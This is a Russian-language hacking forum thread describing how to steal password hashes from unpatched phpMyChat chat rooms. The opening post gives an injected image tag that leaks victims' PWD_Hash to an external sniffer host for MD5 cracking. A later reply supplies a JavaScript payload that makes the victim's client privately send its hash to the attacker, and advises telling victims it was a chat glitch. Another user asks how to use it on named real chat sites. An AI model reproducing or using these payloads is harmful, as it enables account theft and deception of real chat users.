Получаем пароли в phpMyChat

Discussion in 'Песочница' started by Учаснег, 12 Jun 2007.

  1. Учаснег

    Учаснег New Member

    Joined:
    25 May 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Работает во всех непропатченых чатах.
    Много тут статей о том , как достать хеши пользователей...
    Имхо.. , самый простой способ.
    Все те же \x3c \x3e.
    Создаем ссылку на а-чатовский сниффер,
    \x3cimg src="http\x3a//old.antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e
    Кидаем ее в общак и бежим смотреть логи.
    Там получается чтот вроде *
    REFERER=http://-----PWD_Hash=2fdd85f2e81f897493942071267c94ad&First=1
    То, что нам нужно , стоит после PWD_Hash=..... и до
    &First=1.
    Копиреум , и скармливаем проге MD5Inside.
    Очень много вариантов , куда этот шеш можно деть-)
    З.Ы. Ники на русском переводятся в цыферки и проценты , обратный ход можно получить с помощью яндеса, вставля их в запрос)

    З.Ы.2 Первая статья. Сторого не судите.
     
    1 person likes this.
  2. katala17

    katala17 New Member

    Joined:
    31 Mar 2008
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    непонял что куда копировать?
     
  3. katala17

    katala17 New Member

    Joined:
    31 Mar 2008
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    как это всё применить на http://citychat.spb.ru/ подскажите
     
  4. katala17

    katala17 New Member

    Joined:
    31 Mar 2008
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    ну или этот http://chat.xuk.ru/index.php
     
  5. TR0J@N

    TR0J@N Elder - Старейшина

    Joined:
    30 Mar 2007
    Messages:
    105
    Likes Received:
    58
    Reputations:
    13
    А так непроще чтоб никуда небегать)

    Code:
    /TO [COLOR=Green]ЖЕРТВА[/COLOR] \x3cimg src=javascript:window.parent.window.input.document.MsgForm.M.value="/TO%20[COLOR=Red]TROJAN[/COLOR]%20"+window.parent.window.input.document.MsgForm.PWD_Hash.value;window.parent.window.input.document.MsgForm.submit() name="imaga"\x3e

    Логично жертва логин кому отправляем, TROJAN наш логин)
    Ну и в результате в приват к нам придёт хеш) (единсвенный минус енто жертва видит его, НО многие просто спрашивают "Что енто??" :confused: " ну и ответьте глюки чата, не просвещённый непоймёт что от него отправилось!)
     
    #5 TR0J@N, 28 Apr 2008
    Last edited: 29 Apr 2008
Loading...
Similar Threads - Получаем пароли phpMyChat
  1. Loents
    Replies:
    14
    Views:
    2,732